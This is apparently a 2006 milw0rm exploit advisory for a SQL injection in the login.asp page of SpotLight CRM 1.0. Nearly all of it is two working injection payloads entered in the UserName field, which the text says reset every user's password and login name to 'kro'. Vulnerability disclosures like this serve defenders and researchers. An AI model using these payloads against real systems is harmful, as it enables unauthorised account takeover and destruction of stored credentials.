*************************************************************************************
# Title : SpotLight CRM 1.0 (login.asp) | Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# $$$ : $2,499
*************************************************************************************
[[SQL]]]
###http://[target]/[path]//login.asp=[POST SQL]
Example:
-> All User UserName And Password Changed "kro"
// login.asp UserName: ';update login set password='kro'--
// login.asp UserName: ';update login set loginName='kro'--
[[/SQL]]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-12-09]
